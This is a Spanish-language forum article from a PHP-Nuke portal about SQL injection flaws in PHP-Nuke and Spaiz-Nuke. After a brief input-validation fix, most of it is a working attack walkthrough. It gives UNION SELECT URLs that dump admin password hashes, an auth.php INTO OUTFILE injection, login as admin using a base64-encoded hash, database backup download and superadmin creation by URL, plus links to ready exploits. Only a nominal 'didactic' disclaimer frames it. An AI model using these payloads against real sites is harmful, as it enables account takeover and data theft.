:: Inicio - Foros - Nuevos Mensajes (solo registrad@s) - Descargas - Tu Cuenta - Publicidad ::

 Principal
homepage.gif Inicio
icon_group.gif Foros
Earth.gif Pagina de Inicio Wap/Pda/PalmNuevo contenido
tree.gif Menú ComúnShow/Hide content
tree-T.gif Buscar
tree-T.gif Recomiendanos
tree-T.gif Enlazanos
tree-T.gif Contactanos
tree-T.gif Secciones
tree-T.gif Nosotros
tree-L.gif Preguntas Frecuentes
tree.gif Menu de UsuariosShow/Hide content
tree-T.gif Tu Cuenta
tree-T.gif Lista_Usuarios
tree-L.gif Mensajes_Privados
tree.gif ParticipaNuevo contenidoShow/Hide content
tree-T.gif Foros
tree-T.gif Enviar Noticia/Articulo
tree-T.gif Escribir Critica de Cine
tree-T.gif Enviar Imágen
tree-T.gif Enviar Truco
tree-T.gif Enviar Descarga
tree-T.gif Anunciar en Mercadillo
tree-T.gif Enviar Enlace
tree-L.gif Enviar Termino a la Biblioteca
tree.gif CineShow/Hide content
petitrond.gif Criticas de Cine
petitrond.gif Imágenes de Cine
petitrond.gif Foro de Cine
tree.gif Zona de RolNuevo contenidoShow/Hide content
petitrond.gif Zona de Rol
petitrond.gif Foros de Rol
petitrond.gif Descargas de Rol
petitrond.gif Imagenes de Rol
petitrond.gif Diccionario Vampirico
petitrond.gif Mitos de Cthulhu
tree.gif AcademiaShow/Hide content
tree-T.gif Manuales
tree-T.gif Galeria de Imagenes
tree-T.gif Novelas/Relatos
tree-T.gif Vídeos
tree-T.gif La Última Frontera
tree-T.gif Biblioteca
tree-L.gif Libreria
tree.gif ServiciosShow/Hide content
tree-T.gif Emoticonos para messenger
tree-T.gif Registro 5000 Buscadores
tree-T.gif Postales Gratuitas
tree-T.gif Email Gratuito
tree-T.gif Crea tu Avatar
tree-T.gif Trucos de Juegos
tree-T.gif Escucha la Radio
tree-T.gif Rap Mobile
tree-T.gif Astro Love
tree-L.gif Mercadillo
tree.gif NoticiasShow/Hide content
tree-T.gif Enviar Noticia/Articulo
tree-T.gif Hemeroteca
tree-L.gif Secciones
tree.gif ComunidadShow/Hide content
tree-T.gif Afiliacion
tree-L.gif Top de Página de Inicio
petitrond.gif Webmasters
petitrond.gif El Nexo
petitrond.gif Torero-X
petitrond.gif Rap Mobile
petitrond.gif Astro Love
petitrond.gif Móvil Sexy
petitrond.gif Hot Cell
tree.gif TiendaShow/Hide content
tree-T.gif Merchandising
tree-L.gif Sex Shop de Torero-x
tree.gif Descargas y enlacesNuevo contenidoShow/Hide content
petitrond.gif Zona de Descarga
petitrond.gif Buscador y Directorio
petitrond.gif Enlaces Web
petitrond.gif Pagina de Inicio Wap/Pda/Palm
tree.gif EstadísticasShow/Hide content
tree-T.gif Top 10
tree-L.gif Encuestas
tree.gif Zona SMSNuevo contenidoShow/Hide content
petitrond.gif MobileHitNuevo contenido
petitrond.gif Logos y Melodías
petitrond.gif Astro Love
petitrond.gif Juegos
petitrond.gif Rap Mobile
petitrond.gif Chatea y Liga
petitrond.gif Móvil Sexy
petitrond.gif Hot Cell
petitrond.gif Horóscopo
petitrond.gif Chistes a tu Móvil
petitrond.gif Piropos
 usuari@s


Anónim@




Código de Seguridad
Código de Seguridad
Escribe el Código de Seguridad

Recordar

(Regístrate)

Membresía:
Último: santo267
Nuevos Hoy: 0
Nuevos Ayer: 0
Total: 2562
Gente en línea:
Visitantes: 2 (100%)
Miembros: 0 (0%)
Total: 2

En línea ahora:
Visitantes:
01: Visitante
02: Visitante
 Ãšltimos Vídeos
-- Últimos vídeos --

 
    Bug peligroso ante el atake de los hackers

Bugscatosino escribió "

En muchos sitios esta dando vuelta la noticia de una nueva falla en el PHP-Nuke, que permite tomar el control de todo el sistema.
Pero hay cosas que muchos no tiene claro todavia, por eso aqui las explico, y doy mas detalles sobre el tema.....
Te puede descargar los archivos ya modificados AQUÌ


Dale a leer mas



Primero: La falla NO es en el archivo modules.php, sino
que esta presente en los modulos Downloads y Weblinks, entre otros. El archivo
modules.php solo se encarga de incluir los archivos de cada modulo para que asi
la URL quede mas presentable.



Por eso el advisorie:

http://www.securityfocus.com/archive/1/340664



Esta mal desde un principio. Otra cosa para aclarar, que podriamos llamar:



Segundo: Esta falla no tiene nada de nueva, ya que es la misma
descubierta para las vesiones:
- PHP-Nuke 6.0

- PHP-Nuke 6.5 RC3

- PHP-Nuke 6.5 RC2

- PHP-Nuke 6.5 RC1

- PHP-Nuke 6.5 FINAL

- PHP-Nuke 6.5 BETA 1

- PHP-Nuke 6.5

- PHP-Nuke 6.5 with all patches ,

- PHP-Nuke 6.0 with all patches.

- PHP-Nuke 5.5 with all patches
Es por eso que insisto en que no es una nueva falla, ya que en las ultimas
versiones del PHP-Nuke se viene usando los mismo modulos de esas versiones
anteriormente citadas, y que no han sido parcheadas, por eso es que son
vulnerables todas las ultimas versiones del PHP-Nuke, hasta la 6.9
,
segun he comprobado.
No son solo los modulos Downloads y WebLinks, sino todo aquel modulo o pagina
que no controle correctamente sus variables.
Una forma rapida y facil de solucionar esto es controlando el contenido de
las variables de la siguiente forma:
# $variable es la que debemos controlar, asi que cambia su nombre segun te convenga ;)
$variable = addslashes($variable);
if(!isset($variable) || $variable == NULL || !is_numeric ($variable))
{
Header("Location: index.html");
exit();
}
Inyección SQL en PHP-Nuke y Spaiz-Nuke
Eso en el caso de que deba ser numerica, sino basta con quitar el !is_numeric($variable)
de la condicion del IF.
Bueno me voy a dejar de dar vueltas y pasamos al tema de la explotacion de
las falla, que no solo sirve para hacer daño, sino que les permitira testear
sus sistemas y saber como solucionar este tipo de fallas.
Bueno, para poder ver los hashes de los admins, debemos hacer una pequeña
insercion de codigo SQL, en las variales $cid de los modulos en cuestion. Por
ejemplo:
Para el Modulo Download:

http://victima-nukeada/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20
Para el Modulo WebLinks:

http://victima-nukeada/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Nota: Para que funcione en Spaiz-Nuke debes cambiar
nuke_authors por spnuke_authors
Vulnerabilidad en el archivo auth.php:
Esta vulnerabilidad se encuentra en el archivo auth.php, en la función que
comprueba el usuario y la contraseña (Según su descubridor, testeado en spaiz-nuke)

En concreto en la variable $aid, porque no se comprueba que el contenido de la
misma sea seguro. Mediante el uso de las '', es posible crear una URL como esta:

http://victima-nukeada/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt
En este ejemplo se crea un archivo en /path_to_file/pwd.txt que contiene el
password (encriptado en MD5) del admin.


Accediendo con la contraseña encriptada:



Un atacante puede autentificarse en el PHP-Nuke incluso sin conocer el password
desencriptado.



El método es el siguiente:
Una vez que ya obtuvimos los hashes de los admins, ya sea explotando las
fallas en los modulos como en el auth.php, debemos codificar en base64 el
ususario y la contraseña obtenidos mediante la inyección SQL (o por cualquier
otro método).



Para pasarlo a base64 puedes utilizar cualquier codificador de base64 o puedes
hacerlo online en una web como esta:

http://www.isecurelabs.com/base64.php

http://www.rzw.com.ar/base64nuke.php ;)



Buscamos el equivalente en base64 de la siguiente linea:

login:crypt_.passwd:

donde login es el usuario y crypt_.passwd es la contraseña en MD5
Por ejemplo, con esta linea

admin:21232f297a57a5a743894a0e4a801fc3:
obtendriamos algo así:

YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6
Ahora podemos acceder al panel del administrador usando una URL de este tipo:

http://victima-nukeada/admin.php?admin=YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6
Una vez dentro te daras cuenta que cuando quieres acceder a cada opcion del
panel de control te volvera a pedir el password, lo unico que tienes que hacer,
es copiar el enlace de la seccion a la que quieres ingresar y agregarle a dicha
URL los mismo que le pusiste al admin.php para ver el panel de administracion.
Por ejemplo:
Para bajarte la base de datos:

http://victima-nukeada/admin.php?op=backup&admin=YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6
Creando Admins:
Si queremos ahorrarnos el trabajo de andar colocando esos datos en la URL,
podemos crearnos un nuevo admin con el siguiente exploit escrito en Perl:

http://rst.void.ru/download/r57nuke.txt



Exploit en PHP en Rynho Zeros Web:

http://www.rzw.com.ar/xptnk.php (Usar con moderacion ;)




Puedes hacer esto tambien, mediante un enlace como el siguiente:

http://victima-nukeada/admin.php?op=AddAuthor&add_radminsuper=1&add_name=[Nick]&add_aid=[Nick]&add_email=[Email]&add_pwd=[Password]&admin=[Hash]
Nick corresponde al que tendra el nuevo admin, el email lo mismo, el password
debe ser colocado en texto plano no el hash, y el Hash, es el obtenido
utilizando alguno de los metodos anteriormente explicados y correspondiente al
admin del sitio, preferentemente el God (Admin Principal).


Basado en:

http://www.security.nnov.ru/search/document.asp?docid=5201

http://www.cyruxnet.com.ar/phpnuke_modules.htm



Aclaracion: Este articulo esta basado en el que Cyruxnet
publico en su web, pero se ha modificado para aclarar ciertos puntos, y agregar
otros. Ademas, este texto es con fines didácticos, no nos hacemos responsables
del mal uso que se haga de lo aquí explicado.

Por CATOSINO

"





Sin Comentarios
No se permiten comentarios Anónimos, Regístrese por favor
Temas Asociados

BugsPHP-Nuke

 
 Enlaces Relacionados
 Más Acerca de Bugs
 Noticias de Tamagochi


Noticia más leída sobre Bugs:
Bug peligroso ante el atake de los hackers

 Votos del Artículo
Puntuación Promedio: 4.5
votos: 2


Por favor quédate un segundo y vota por este artículo:

Excelente
Muy Bueno
Bueno
Regular
Malo


 Opciones

 Versión Imprimible  Versión Imprimible

 Enviar a un Amigo  Enviar a un Amigo






Todos los logos y marcas registradas en este Portal, son propiedad de sus respectivos dueños. Las opiniones son propiedad de quien los postea. Todo lo demás © 2003 por Tamagochi.
:: Viste tu movil :: Casino en Linea :: Torero-X, Directorio Erótico Gratuito :: Webmasters :: Top Ranking :: Cursos de Aleman :: Cursos de Aleman en Verano ::
Puedes incluir nuestras noticias en tu sitio usando el archivo backend.php o ultramode.txt
Web site engine code is Copyright © 2003 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Nuke ET Copyright © 2004 por Truzone.
 Página Generada en: 0.232 segundos 
:: Gw Theme :: Copyright (2007) - :: Página de Inicio ::